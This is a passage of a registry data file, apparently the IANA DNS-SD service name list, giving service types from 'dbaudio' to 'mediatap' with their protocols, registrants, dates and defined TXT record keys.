network,[d_b_audiotechnik],[Christian_Laendner],2011-10-06,,,,,"Defined TXT keys:txtvers= protovers= guid= name= sn= device= fwver=" dbaudio,,udp,d&b audiotechnik remote network,[d_b_audiotechnik],[Christian_Laendner],2011-10-06,,,,,"Defined TXT keys:txtvers= protovers= guid= name= sn= device= fwver=" dccp-ping,,dccp,ping/traceroute using DCCP,[Samuel_Jero],[Samuel_Jero],2012-11-14,,,1885957735,,Defined TXT keys: None dell-soo-ds,,tcp,Spotlight on Oracle Diagnostic Server,[Dell_2],[Rob_Griffin_3],2013-10-03,,,,,Defined TXT keys: None dell-soo-ds,,udp,Spotlight on Oracle Diagnostic Server,[Dell_2],[Rob_Griffin_3],2013-10-03,,,,,Defined TXT keys: None dell-soss-ds-w,,tcp,Spotlight on SQL Server Diagnostic Server HTTP,[Dell_2],[Rob_Griffin_3],2013-10-03,,,,,Defined TXT keys: None dell-ssms-ds,,tcp,Spotlight SSMS Plugin Diagnostic Server,[Dell_2],[Rob_Griffin_3],2013-10-03,,,,,Defined TXT keys: None device-info,,,Device Info,[Stuart_Cheshire_5][Marc_Krochmal],[Stuart_Cheshire_5][Marc_Krochmal],,,,,,Not a service type. Special name reserved for DNS-SD device info. devonsync,,tcp,DEVONthink synchronization protocol,[DEVONtechnologies_LLC],[Rob_Rix][Eric_Boehnisch-Volkmann],2011-10-18,,,,,Defined TXT keys: None at present dictation,,,Use of a dictation service by a hand-held device,[Nuance_Communications_Inc],[Mark_Jackson],2011-10-27,,,,,"Defined TXT keys: ver, name" difi,,,EyeHome,[Elgato],[Elgato],,,,,,Defined TXT keys: None disconnect,,,DisConnect Peer to Peer Game Protocol,[Michael_S_Bogovich],[Michael_S_Bogovich],,,,,,Defined TXT keys: None dist-opencl,,,Distributed OpenCL discovery protocol,[William_Dillon],[William_Dillon],,2013-04-10,,,,"Defined TXT keys: TCPendpoint, UDPendpoint, UUID" ditrios,,,Ditrios SOA Framework Protocol,[Mark_Schmatz],[Mark_Schmatz],,,,,,Defined TXT keys: http://www.ditrios.org/index.php?link=tutorial/index#zeroconf divelogsync,,,Dive Log Data Sharing and Synchronization Protocol,[Greg_McLaughlin],[Greg_McLaughlin],,,,,,Defined TXT keys: None dlpx-sp,,tcp,Delphix Session Protocol,[Delphix_Corp],[Peng_Dai],2012-10-02,,,,,Defined TXT keys: None dltimesync,,udp,Local Area Dynamic Time Synchronisation Protocol,[Geoff_Back_3],[Geoff_Back_3],,,,,,Defined TXT keys: None dns-sd,,,DNS Service Discovery,[Stuart_Cheshire_5][Marc_Krochmal],[Stuart_Cheshire_5][Marc_Krochmal],,,,,,Not a service type. Special name reserved for DNS-SD meta queries. dns-update,,udp,DNS Dynamic Update Service,[Kiren_Sekar_2],[Kiren_Sekar_2],,,,,,"DNS Dynamic Update Service for a given domain may not necessarily be provided by the principal name servers as advertised by the domain's ""NS"" records, and may not necessarily always be provided on port 53. The ""_dns-update._udp.."" SRV record gives the target host and port where DNS Dynamic Update Service is provided for the named domain." dop,,,Roar (Death of Productivity),[Massive_Flow_Product],[Massive_Flow_Product],,,,,,Defined TXT keys: name= dropcopy,,,DropCopy,[base_t_Interactive],[base_t_Interactive],,,,,,Defined TXT keys: None dsgsync,,,Datacolor SpyderGallery Desktop Sync Protocol,[Datacolor],[Heath_Barber],2011-10-14,,,,,Defined TXT keys: Proprietary dsl-sync,,,Data Synchronization Protocol for Discovery Software products,[John_Hogg],[John_Hogg],,,,,,Defined TXT keys: Proprietary dtrmtdesktop,,,Desktop Transporter Remote Desktop Protocol,[Daniel_Stodle],[Daniel_Stodle],,,,,,Defined TXT keys: None duckrace,,tcp,A communication protocol that allows a school teacher to set work activities to students over a LAN.,[Stinky_Kitten_Limited],[Gary_Atkinson],2013-10-03,,,,,Defined TXT keys: txtvers uuid devicename dxtgsync,,,Documents To Go Desktop Sync Protocol,[Tim_Boyle],[Tim_Boyle],,,,,,Defined TXT keys: Proprietary ea-dttx-poker,,,Protocol for EA Downtown Texas Hold 'em,[Ben_Lewis],[Ben_Lewis],,,,,,Defined TXT keys: None earphoria,,,Earphoria,[Rogue_Amoeba],[Rogue_Amoeba],,,,,,Defined TXT keys: None easyspndlg-sync,,tcp,Sync service for the Easy Spend Log app,[Aaron_L_Bratcher],[Aaron_L_Bratcher],2011-10-17,,,,,Defined TXT keys: None eb-amuzi,,,Amuzi peer-to-peer session synchronization protocol,[Zachary_Gramana],[Zachary_Gramana],,,,,,Defined TXT keys: Proprietary eb-sync,,tcp,Easy Books App data sync helper for Mac OS X and iOS,[Geode_Software_Ltd],[Mathew_Waters],2014-05-14,,,,,Defined TXT keys: None eb-sync,,udp,Easy Books App data sync helper for Mac OS X and iOS,[Geode_Software_Ltd],[Mathew_Waters],2014-05-14,,,,,Defined TXT keys: None ebms,,,ebXML Messaging,[Matthew_MacKenzie],[Matthew_MacKenzie],,,,,,Defined TXT keys: Endpoint= ecms,,,Northrup Grumman/Mission Systems/ESL Data Flow Protocol,[Dan_Goff],[Dan_Goff],,,,,,Defined TXT keys: None ebreg,,,ebXML Registry,[Matthew_MacKenzie],[Matthew_MacKenzie],,,,,,Defined TXT keys: HttpBinding= ecbyesfsgksc,,,Net Monitor Anti-Piracy Service,[Guy_Meyer],[Guy_Meyer],,,,,,Defined TXT keys: None edcp,,udp,LaCie Ethernet Disk Configuration Protocol,[Nicolas_Bouilleaud],[Nicolas_Bouilleaud],,,,,,"Defined TXT keys: ip, mac, dhcp, mask, gtwy, wins, name, version" eeg,,tcp,EEG System Discovery across local and wide area networks,[Shifted_Current],[Joel_Aaron_Clipperton],2012-09-11,,,,,Defined TXT keys: Type efkon-elite,,tcp,EFKON Lightweight Interface to Traffic Events,[EFKON_AG],[Thomas_Kemmer],2011-10-20,,,,,"Defined TXT keys: txtvers, protovers, model, serial, scheme, path" egistix,,,Egistix Auto-Discovery,[Dave_Lindquist_2],[Dave_Lindquist_2],,,,,,Defined TXT keys: None eheap,,,Interactive Room Software Infrastructure (Event Sharing),,,,,,,,Defined TXT keys: None embrace,,,DataEnvoy,[Rob_MacGregor],[Rob_MacGregor],,,,,,Defined TXT keys: None enphase-envoy,,tcp,Enphase Energy Envoy,[Enphase_Energy_Inc],[Chris_Eich],2011-11-08,,,,,"Defined TXT keys: - txtvers - protovers - serialnum" ep,,,Endpoint Protocol (EP) for use in Home Automation systems,[Tommy_van_der_Vorst],[Tommy_van_der_Vorst],,,,,,Defined TXT keys: dns-sd_mdns esp,,tcp,Extensis Server Protocol,[Loren_Barr],[Loren_Barr],2006-12,,,,,Defined TXT keys: none eucalyptus,,,Eucalyptus Discovery,[Support_Team],[Support_Team],,,,,,Defined TXT keys: Eucalyptus-DNS-SD eventserver,,,Now Up-to-Date,,,,,,,,Defined TXT keys: None evp,,tcp,EvP - Generic EVENT protocol,[Quentin_Glidic],,2013-06-05,,,,,Defined TXT keys: None evs-notif,,,EVS Notification Center Protocol,[Eric_Gillet],[Eric_Gillet],,,,,,"Defined TXT keys: ID, Address" ewalletsync,,,Synchronization Protocol for Ilium Software's eWallet,[Dan_Amstutz],[Dan_Amstutz],,,,,,Defined TXT keys: name= example,,,Example Service Type,,,,,,,,"Not a real service type. Special 'pretend' service types (""_example._udp"" and ""_example._tcp"") reserved for use in illustrative examples in books and other documentation." exb,,,Exbiblio Cascading Service Protocol,[Claes_Fredrik_Mannby],[Claes_Fredrik_Mannby],,,,,,Defined TXT keys: Will be described at www.exbiblio.com extensissn,,,Extensis Serial Number,[Extensis],[Extensis],,,,,,Defined TXT keys: None eyetvsn,,,EyeTV Sharing,[Elgato],[Elgato],,,,,,"Defined TXT keys: txtvers=1, keyhash=<4 bytes>" facespan,,,FaceSpan,[Kerry_Hazelgren],[Kerry_Hazelgren],,,,,,Defined TXT keys: None faxstfx,,,FAXstf,[Smith_Micro],[Smith_Micro],,,,,,Defined TXT keys: None feed-sharing,,,NetNewsWire 2.0,[Ranchero_Software],[Ranchero_Software],,,,,,Defined TXT keys: None firetask,,,Firetask task sharing and synchronization protocol,[Gerald_Aquila],[Gerald_Aquila],,,,,,Defined TXT keys: None fish,,,Fish,[Oriol_Ferrer_Mesia],[Oriol_Ferrer_Mesia],,,,,,Defined TXT keys: None fix,,,Financial Information Exchange (FIX) Protocol,[Joakim_Johansson],[Joakim_Johansson],,,,,,"Defined TXT keys: Currently valid enumerated values: FIX Session Protocol Versions (SESSIONVERSION): 1.1 FIX Application Protocol Versions (APPLICATIONVERSION): 2.7, 3.0, 4.0, 4.1, 4.2, 4.3, 4.4, 5.0 Possible TXT records defined and their values (replace uppercase text with enumerations from the list above): txtvers=1 fix=APPLICATIONVERSION fix supported=APPLICATIONVERSION[,APPLICATIONVERSION, ... ,APPLICATIONVERSION] fixt=SESSIONVERSION" fjork,,,Fjork,[John_Schilling],[John_Schilling],,,,,,Defined TXT keys: None fl-purr,,udp,FilmLight Cluster Power Control Service,[Darrin_Smart],[Darrin_Smart],,,,,,Defined TXT keys: Proprietary flightdmp,,tcp,Flight Data Monitoring Protocol,[Brad_Head],[Brad_Head],2013-02-07,,,,,Defined TXT keys: None flightdmp,,udp,Flight Data Monitoring Protocol,[Brad_Head],[Brad_Head],2013-02-07,,,,,Defined TXT keys: None flir-ircam,,tcp,FLIR Infrared Camera,[FLIR_Systems_AB],[Bjorn_Roth][Klas_Malmborg],2011-10-20,,,,,Defined TXT keys: Proprietary fmserver-admin,,,FileMaker Server Administration Communication Service,[Eric_Jacobson],[Eric_Jacobson],,,,,,Defined TXT keys: None fontagentnode,,,FontAgent Pro,[Insider_Software],[Insider_Software],,,,,,Defined TXT keys: None foxtrot-serv,,,FoxTrot Search Server Discovery Service,[Jerome_Seydoux],[Jerome_Seydoux],,,,,,Defined TXT keys: None foxtrot-start,,,FoxTrot Professional Search Discovery Service,[Jerome_Seydoux],[Jerome_Seydoux],,,,,,Defined TXT keys: None frameforge-lic,,,FrameForge License,[James_W_Walker],[James_W_Walker],,,,,,Defined TXT keys: Proprietary freehand,,,FreeHand MusicPad Pro Interface Protocol,[Ted_Schroeder],[Ted_Schroeder],,,,,,Defined TXT keys: None frog,,,Frog Navigation Systems,[Rene_Jager],[Rene_Jager],,,,,,"Defined TXT keys: type, name, id" ftpcroco,,,Crocodile FTP Server,[Xnet_Communications],[Xnet_Communications],,,,,,Defined TXT keys: None fv-cert,,udp,Fairview Certificate,[Jim_Lyle_2],[Jim_Lyle_2],,,,,,"Defined TXT keys: DevID=, DevPK=" fv-key,,udp,Fairview Key,[Jim_Lyle_2],[Jim_Lyle_2],,,,,,Defined TXT keys: KeyID= fv-time,,udp,Fairview Time/Date,[Jim_Lyle_2],[Jim_Lyle_2],,,,,,Defined TXT keys: None garagepad,,,Entrackment Client Service,[Talkative_AB],[Talkative_AB],,,,,,Defined TXT keys: None gforce-ssmp,,,G-Force Control via SoundSpectrum's SSMP TCP Protocol,[Andy_O_Meara],[Andy_O_Meara],,,,,,Defined TXT keys: None glasspad,,,GlassPad Data Exchange Protocol,[Emmanuel_Merali],[Emmanuel_Merali],,,,,,Defined TXT keys: guid glasspadserver,,,GlassPadServer Data Exchange Protocol,[Emmanuel_Merali],[Emmanuel_Merali],,,,,,Defined TXT keys: guid glrdrvmon,,,OpenGL Driver Monitor,[Dave_Springer],[Dave_Springer],,,,,,Defined TXT keys: None goorstop,,tcp,For iOS Application named GoOrStop,[Charlie_Kim],[Charlie_Kim],2012-08-28,,,,,Defined TXT keys: None googlecast,,tcp,Service related to Google Cast which is a technology for enabling multi-screen experiences. See developers.google.com/cast for more details,[Google_Inc],[Jason_Schiller],2014-01-16,,,,,Defined TXT keys: None gotit,,tcp,Network name Got It!,[Bill_Vlahos],[Bill_Vlahos],2013-12-13,,,,,Defined TXT keys: info=name gpnp,,,Grid Plug and Play,[David_Brower],[David_Brower],,,,,,Defined TXT keys: None grillezvous,,,Roxio ToastAnywhere(tm) Recorder Sharing,,,,,,,,Defined TXT keys: AppID= KeyHash= groovesquid,,tcp,Groovesquid Democratic Music Control Protocol,[www_nsovocal_com],[Ruben_Beltran],2011-10-18,,,,,Defined TXT keys: None growl,,,Growl,,,,,,,,Defined TXT keys: None gsremotecontrol,,tcp,General Satellite set-top box remote control,[General_Satellite],[Sergey_Zubov],2014-02-25,,,,,Defined TXT keys: None gucam-http,,tcp,Image Data Transfer API for Wi-Fi Camera Devices over HTTP,[Ripplex_Inc],[Hiroshi_Matsuda],2013-03-04,,,,,Defined TXT keys: device-name= guid,,,Special service type for resolving by GUID (Globally Unique Identifier),,,,,,,,"Defined TXT keys: Varies; Depends on type of service being offered/resolved Although DNS-SD does not recommend or advocate using GUIDs as the primary name of an offered service why not?, it does support use of GUIDs as service names where developers want to use them that way. Typically users do not browse for GUIDs. They are not user-friendly and not very informative. Typically, the service is advertised as usual, using a user-friendly name. One of the TXT record attributes is a GUID for the service instance. Once the user has browsed and chosen the desired service instance via its user-friendly name, the service is resolved, the TXT record is retrieved, and the GUID is stored. A given network service instance is therefore being advertised two ways, for example: ._ptp._tcp.local ._guid._tcp.local On subsequent accesses to the service, the GUID-based name is resolved, and that particular service instance is discovered, even if the user has subsequently changed the user-friendly name to something else. Note: Although each different logical service type needs to have its own different DNS-SD service type, all GUID-based names use the same pseudo-type: ""_guid._tcp"". There is no possibility of name conflict because (by definition) GUIDs are globally unique." h323,,,"H.323 Real-time audio, video and data communication call setup protocol",[Will_MacDonald],[Will_MacDonald],,,,,,Defined TXT keys: None help,,,HELP command,,,,,[RFC1078],,,TCP Port Service Multiplexer (TCPMUX) hg,,,Mercurial web-based repository access,,,,,,,,"Defined TXT keys: None path= description=" hinz,,,HINZMobil Synchronization protocol,[Jorg_Laschke],[Jorg_Laschke],,,,,,Defined TXT keys: None hmcp,,,Home Media Control Protocol,[Will_Lahr],[Will_Lahr],,,,,,Defined TXT keys: None home-sharing,,,iTunes Home Sharing,[Amandeep_Jawa_3],[Amandeep_Jawa_3],,,,,,"Defined TXT keys: txtvers, hQ, iTSh Version, MID, Database ID, dmb, Version, OSsi, hG, hC, Machine ID" homeauto,,,iDo Technology Home Automation Protocol,[Tony_de_Rijk],[Tony_de_Rijk],,,,,,Defined TXT keys: None homeconnect,,tcp,Home Connect Protocol,[BSH_Bosch_und_Siemens_Hausgeraete_GmbH],[Jens_Clauss],2013-06-11,,,,,Defined TXT keys: txtvers + Proprietary honeywell-vid,,udp,Honeywell Video Systems,[Shankar_Prasad],[Shankar_Prasad],,,,,,Defined TXT keys: None hotwayd,,,Hotwayd,,,,,,,,Defined TXT keys: None howdy,,,Howdy messaging and notification protocol,[Ozate_Inc],[Joseph_Sickel],,2011-10-12,,,,Defined TXT keys: None hpr-bldlnx,,,HP Remote Build System for Linux-based Systems,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: rh73, rhel3, rhel4, deb31, suse102" hpr-bldwin,,,HP Remote Build System for Microsoft Windows Systems,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: xp, vista" hpr-db,,,Identifies systems that house databases for the Remote Build System and Remote Test System,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: bld, tst, mstr" hpr-rep,,,HP Remote Repository for Build and Test Results,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: bld, tst, official" hpr-toollnx,,,HP Remote System that houses compilers and tools for Linux-based Systems,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: rh73, rhel3, rhel4, deb31, suse102" hpr-toolwin,,,HP Remote System that houses compilers and tools for Microsoft Windows Systems,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: xp, vista" hpr-tstlnx,,,HP Remote Test System for Linux-based Systems,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: rh73, rhel3, rhel4, deb31, suse102" hpr-tstwin,,,HP Remote Test System for Microsoft Windows Systems,[Jeffrey_J_Walls],[Jeffrey_J_Walls],,,,,,"Defined TXT keys: xp, vista" hs-off,,,Hobbyist Software Off Discovery,[Rob_Jonson],[Rob_Jonson],,,,,,Defined TXT keys: None htsp,,,Home Tv Streaming Protocol,[Andreas_Oman],[Andreas_Oman],,,,,,Defined TXT keys: None https,,tcp,HTTP over SSL/TLS,[Tim_Berners_Lee],[Tim_Berners_Lee],,,,,,"Web browsers like Safari and Internet Explorer (with the Bonjour for Windows plugin) DO NOT browse for DNS-SD service type ""_https._tcp"" in addition to browsing for ""_http._tcp"". This is a conscious decision to reduce proliferation of service types, to help keep DNS-SD efficient on the network. Today, if a user types http://www.mybank.com/ into their web browser, the web server automatically redirects the user to https://www.mybank.com/. Rather than having an entirely different DNS-SD service type for https, we recommend using the same redirection mechanism: advertise a plain ""http"" service, which consists of nothing except an HTTP redirection to the desired ""https"" URL. Work is currently being done on adding mechanisms to HTTP and TLS to allow the server to tell the client that it needs to activate TLS on the current connection before proceeding. If this becomes widely adopted, it further justifies the decision to not create a separate DNS-SD service type ""_https._tcp"", because security becomes just another one of the things that is negotiated on a per-connection basis (like content-type negotiation today) rather than being an entirely separate thing." htvncconf,,udp,HomeTouch Vnc Configuration,[Yuval_Rakavy],[Yuval_Rakavy],2012-07-10,,,,,Defined TXT keys: None hyperstream,,,Atempo HyperStream deduplication server,[Laurent_Charmet],[Laurent_Charmet],,,,,,"Defined TXT keys: version=x.y.z.w uuid=<36 bytes UUID string> host=" iad1,,,BBN IAD,,,,2013-05-24,,,,This service name is no longer in use. iad2,,,BBN IAD,,,,2013-05-24,,,,This service name is no longer in use. iad3,,,BBN IAD,,,,2013-05-24,,,,This service name is no longer in use. iaudit,,tcp,Braemar Inventory audit,[Braemar_Consulting],[Richard_Thompson],2014-03-05,,,,,Defined TXT keys: None ibiz,,,iBiz Server,[IGG_Software],[IGG_Software],,,,,,Defined TXT keys: None ica-networking,,,Image Capture Networking,[Baskaran_Subramaniam],[Baskaran_Subramaniam],,,,,,Defined TXT keys: None ican,,,Northrup Grumman/TASC/ICAN Protocol,[Laurent_Mihalkovic],[Laurent_Mihalkovic],,,,,,Defined TXT keys: None ichalkboard,,,iChalk,[Math_Game_House_Soft],[Math_Game_House_Soft],,,,,,Defined TXT keys: None ichat,,,iChat 1.0,[Jens_Alfke],[Jens_Alfke],,,,,,Defined TXT keys: Proprietary iconquer,,,iConquer,[Andrew_Zamler_Carhar],[Andrew_Zamler_Carhar],,,,,,Defined TXT keys: None icontrolbox,,tcp,A Remote Control Application service used to control Computers on a Local Area Network,[Umair_Cheema],[Umair_Cheema],2013-07-08,,,,,Defined TXT keys: None idata,,,Generic Data Acquisition and Control Protocol,[Carson_Fenimore],[Carson_Fenimore],,,,,,Defined TXT keys: None idsync,,,SplashID Synchronization Service,[Justin_Cepelak],[Justin_Cepelak],,,,,,Defined TXT keys: Proprietary ifolder,,,Published iFolder,[Brady_Anderson],[Brady_Anderson],,,,,,Defined TXT keys: version=? ihouse,,,Idle Hands iHouse Protocol,[Toby_Smith],[Toby_Smith],,,,,,Defined TXT keys: None ii-drills,,,Instant Interactive Drills,[Ricky_Sharp],[Ricky_Sharp],,,,,,Defined TXT keys: None ii-konane,,,Instant Interactive Konane,[Ricky_Sharp],[Ricky_Sharp],,,,,,Defined TXT keys: None ilynx,,,iLynX,[iOS_Software],[iOS_Software],,,,,,Defined TXT keys: None im,,tcp,Instant Messaging,,,,,[RFC3861],,, im,,udp,Instant Messaging,,,,,[RFC3861],,, imidi,,,iMidi,[Robert_Grant],[Robert_Grant],,,,,,Defined TXT keys: None imgsync,,tcp,Protocol synchronizing Image data,[Canon_Inc_2],[Kazuo_Moritomo],2013-03-28,,,,,"Defined TXT keys: srvver, mf, md, mn, tid, srv, sid, myhwa, imglist, devAid, serAid, vever" ims-ni,,tcp,Noise Inspector,[IMS_merilni_sistemi],[Metod_Celestina],2012-08-24,,,,,"Defined TXT keys: SN (serial number), SVER (software version), HVER (hardware version), PVER (protocol version))" indigo-dvr,,,Indigo Security Digital Video Recorders,[Haram_Lee],[Haram_Lee],,,,,,Defined TXT keys: Proprietary infboard,,tcp,InfBoard interactive whiteboard protocol,[Eric_Sean_Conner],[Eric_Sean_Conner],2011-10-17,,,,,Defined TXT keys: Proprietary inova-ontrack,,,Inova Solutions OnTrack Display Protocol,,,,,,,,Defined TXT keys: None idcws,,,Intermec Device Configuration Web Services,[Thaddeus_Ternes],[Thaddeus_Ternes],,,,,,Defined TXT keys: version= iota,,tcp,iotaMed medical records server,[MITM],[Martin_Wehlou],2011-10-18,,,,,Defined TXT keys: none ipbroadcaster,,,IP Broadcaster,[base_t_Interactive],[base_t_Interactive],,,,,,Defined TXT keys: None ipspeaker,,,IP Speaker Control Protocol,[Dan_Mahn],[Dan_Mahn],,,,,,Defined TXT keys: None ir-hvac-000,,tcp,HVAC SMIL Server,[Ingersoll_Rand_Inc],[John_Taylor],2011-09-28,,,,,Defined TXT keys: None irelay,,,iRelay application discovery service,[Marc_Diamante],[Marc_Diamante],,,,,,Defined TXT keys: Proprietary irmc,,,Intego Remote Management Console,[Olivier_Delecluse],[Olivier_Delecluse],,,,,,"Defined TXT keys: RMC Client Version=, MAC Address=
" irobotmcs,,tcp,iRobot Monitor and Control Service,[iRobot_Corporation],[Tim_Farlow],2013-11-07,,,,,Defined TXT keys: None irobotmcs,,udp,iRobot Monitor and Control Service,[iRobot_Corporation],[Tim_Farlow],2013-11-07,,,,,Defined TXT keys: None irradiatd-iclip,,tcp,iClip clipboard transfer,[Irradiated_Software],[Thomas_Tempelmann],2012-06-19,,,,,Defined TXT keys: none isparx,,,iSparx,[Philipp_Dreiss],[Philipp_Dreiss],,,,,,Defined TXT keys: None ispq-vc,,,iSpQ VideoChat,[Chris_Silverberg],[Chris_Silverberg],,,,,,Defined TXT keys: None ishare,,,iShare,[Steve_Dekorte],[Steve_Dekorte],,,,,,Defined TXT keys: None isticky,,,iSticky,[Insist],[Insist],,,,,,Defined TXT keys: None istorm,,,iStorm,[Math_Game_House_Soft],[Math_Game_House_Soft],,,,,,Defined TXT keys: None isynchronize,,tcp,iSynchronize data synchronization protocol,[Smart_Apps_LTD],[Sergey_Bolshedvorsky],2011-10-11,,,,,Defined TXT keys: none itap-publish,,tcp,iTap Publishing Service,[HLW_Software_Development_GmbH],[Michael_Lacher],2011-10-11,,,,,Defined TXT keys: uuid= itis-device,,,IT-IS International Ltd. Device,[Ben_Webster],[Ben_Webster],,,,,,"Defined TXT keys: type= configuration= description= version=" itsrc,,,iTunes Socket Remote Control,[Kevin_Leacock],[Kevin_Leacock],,,,,,Defined TXT keys: None ivef,,,Inter VTS Exchange Format,[Harry_ten_Berge],[Harry_ten_Berge],,,,,,Defined TXT keys: None iwork,,,iWork Server,[IGG_Software],[IGG_Software],,,,,,Defined TXT keys: None jcan,,,Northrup Grumman/TASC/JCAN Protocol,[Laurent_Mihalkovic],[Laurent_Mihalkovic],,,,,,Defined TXT keys: None jeditx,,,Jedit X,[Satoshi_Matsumoto],[Satoshi_Matsumoto],,,,,,Defined TXT keys: None jini,,,Jini Service Discovery,[Daniel_Steinberg],[Daniel_Steinberg],,,,,,Defined TXT keys: None jnx-kcsync,,tcp,jollys keychain cloud sync protocol,[Patrick_Stein],[Patrick_Stein],2011-10-24,,,,,"Defined TXT keys: hash=<40hex characters> salt=<40hex characters> uuid=<40hex characters> Example: hash=5e7580598c0d7064d4fc79faaeb42585e1a675f8 salt=f0164cb3a0c3d7efe75abea8fda86d2d56c8dda9 uuid=db61dc092922252e45bbb264f59147138c7fd5fa" jtag,,,Proprietary,[Uwe_Ziegler],[Uwe_Ziegler],,,,,,"Defined TXT keys: blocked=, version=" jukebox,,tcp,Jukebox Request Service,[Gary_Giebler_2],[Gary_Giebler_2],2011-10-18,,,,,Defined TXT keys: None keynoteaccess,,tcp,KeynoteAccess is used for sending remote requests/responses when controlling a slideshow with Keynote Remote,[Apple],[Brad_Vaughan],2011-10-12,,,,,Defined TXT keys: None keynotepairing,,tcp,KeynotePairing is used to pair Keynote Remote with Keynote,[Apple],[Brad_Vaughan],2011-10-12,,,,,Defined TXT keys: None ktp,,,Kabira Transaction Platform,[Ramiro_Sarmiento],[Ramiro_Sarmiento],,,,,,Defined TXT keys: None la-maint,,,IMP Logical Address Maintenance,,,,2013-05-24,,,,This service name is no longer in use. labyrinth,,udp,Labyrinth local multiplayer protocol,[Andreas_Alptun],[Andreas_Alptun],,,,,,Defined TXT keys: None lan2p,,,Lan2P Peer-to-Peer Network Protocol,[Ben_Guild],[Ben_Guild],,,,,,Defined TXT keys: None lapse,,,Gawker,[Phil_Piwonka],[Phil_Piwonka],,,,,,Defined TXT keys: None leaf,,,Lua Embedded Application Framework,[Ico_Doornekamp],[Ico_Doornekamp],,,,,,"Defined TXT keys: name= product= version=" lexicon,,,Lexicon Vocabulary Sharing,[Jacob_Godwin_Jones],[Jacob_Godwin_Jones],,,,,,Defined TXT keys: None liaison,,,Liaison,[Brian_Cully],[Brian_Cully],,,,,,Defined TXT keys: None library,,,Delicious Library 2 Collection Data Sharing Protocol,[William_Shipley],[William_Shipley],,,,,,Defined TXT keys: None libratone,,,Protocol for setup and control of Libratone products,[Libratone_AS],[Claus_Jensen],2011-10-27,,,,,Defined TXT keys: None licor,,,LI-COR Biosciences instrument discovery,[Software_LI-COR_Biosciences],[Kevin_Ediger],2011-10-18,,,,,Defined TXT keys: None llrp-secure,,,RFID reader Low Level Reader Protocol over SSL/TLS,[Jason_Schoon_2],[Jason_Schoon_2],,,,,,Defined TXT keys: None lobby,,,Gobby,[Gobby_0x539],[Gobby_0x539],,,,,,Defined TXT keys: None logicnode,,udp,Logic Pro Distributed Audio,[Nikolaus_Gerteis],[Nikolaus_Gerteis],,,,,,Defined TXT keys: None lonbridge,,,Echelon LonBridge Server,[Rich_Blomseth],[Rich_Blomseth],,,,,,Defined TXT keys: None lontalk,,,LonTalk over IP (ANSI 852),[Michael_Tennefoss],[Michael_Tennefoss],,,,,,Defined TXT keys: None lonworks,,,Echelon LNS Remote Client,[Michael_Tennefoss],[Michael_Tennefoss],,,,,,Defined TXT keys: None lsys-appserver,,,Linksys One Application Server API,[Frank_Zerangue],[Frank_Zerangue],,,,,,"Defined TXT keys: path=value (relative URL) engname=value (string)" lsys-camera,,,Linksys One Camera API,[Frank_Zerangue],[Frank_Zerangue],,,,,,"Defined TXT keys: brand=value (string) model=value (string) version=value (string)" lsys-ezcfg,,,LinkSys EZ Configuration,[Frank_Zerangue],[Frank_Zerangue],,,,,,"Defined TXT keys: model=value (string) serial=value (sring) hwversion=value (string) swversion=value (string) ifversion=value (string) type=value (string) mac=value (12 hex digits)" lsys-oamp,,,"LinkSys Operations, Administration, Management, and Provisioning",[Frank_Zerangue],[Frank_Zerangue],,,,,,"Defined TXT keys: model=value (string) serial=value (sring) hwversion=value (string) swversion=value (string) ifversion=value (string) type=value (string) mac=value (12 hex digits)" lumiere,,tcp,A protocol to remotely control DMX512 devices over the network,[Gangsta_Ltd],[Jean-Charles_Boude],2011-10-13,,,,,Defined TXT keys: None lumis-lca,,tcp,Lumis Cache Appliance Protocol,[Lumis],[Rodrigo_Terra],2011-10-24,,,,,Defined TXT keys: none lux-dtp,,,Lux Solis Data Transport Protocol,[Laurence_Flath],[Laurence_Flath],,,,,,Defined TXT keys: None lxi,,,LXI,[Nick_Barendt_2],[Nick_Barendt_2],,,,,,"Defined TXT keys: txtvers, *IDN?=" lyrics,,,iPod Lyrics Service,[Gary_Giebler],[Gary_Giebler],,,,,,Defined TXT keys: Proprietary macfoh,,,MacFOH,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macfoh-admin,,,MacFOH admin services,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macfoh-audio,,udp,MacFOH audio stream,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macfoh-events,,udp,MacFOH show control events,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macfoh-data,,udp,MacFOH realtime data,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macfoh-db,,,MacFOH database,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macfoh-remote,,,MacFOH Remote,[Shaun_Wexler],[Shaun_Wexler],,,,,,Defined TXT keys: None macminder,,,Mac Minder,[Luma_Code],[Luma_Code],,,,,,Defined TXT keys: None maestro,,,Maestro Music Sharing Service,[Luke_Steffen],[Luke_Steffen],,,,,,Defined TXT keys: None magicdice,,,Magic Dice Game Protocol,[Mike_Yenco],[Mike_Yenco],,,,,,Defined TXT keys: None mandos,,,Mandos Password Server,[Mandos_Maintainers],[Mandos_Maintainers],,,,,,Defined TXT keys: None matrix,,,MATRIX Remote AV Switching,[Ken_Jibiki],[Ken_Jibiki],,,,,,Defined TXT keys: None mavlink,,tcp,MAVLink Micro Air Vehicle Communication Protocol,[Roderick_Mann],[Roderick_Mann],2011-10-20,,,,,Defined TXT keys: 0 mbconsumer,,,MediaBroker++ Consumer,[Nate_Rivard],[Nate_Rivard],,,,,,Defined TXT keys: None mbproducer,,,MediaBroker++ Producer,[Nate_Rivard],[Nate_Rivard],,,,,,Defined TXT keys: None mbserver,,,MediaBroker++ Server,[Nate_Rivard],[Nate_Rivard],,,,,,Defined TXT keys: None mconnect,,,ClairMail Connect,[Sachin_Desai],[Sachin_Desai],,,,,,Defined TXT keys: None mcrcp,,,MediaCentral,[equinux],[equinux],,,,,,Defined TXT keys: None mediaboard1,,,MediaBoardONE Asset and Information Manager data sharing and synchronization protocol,[Thomas_K_Fischer],[Thomas_K_Fischer],,,,,,Defined TXT keys: None mediatap,,tcp,Mediatap streaming 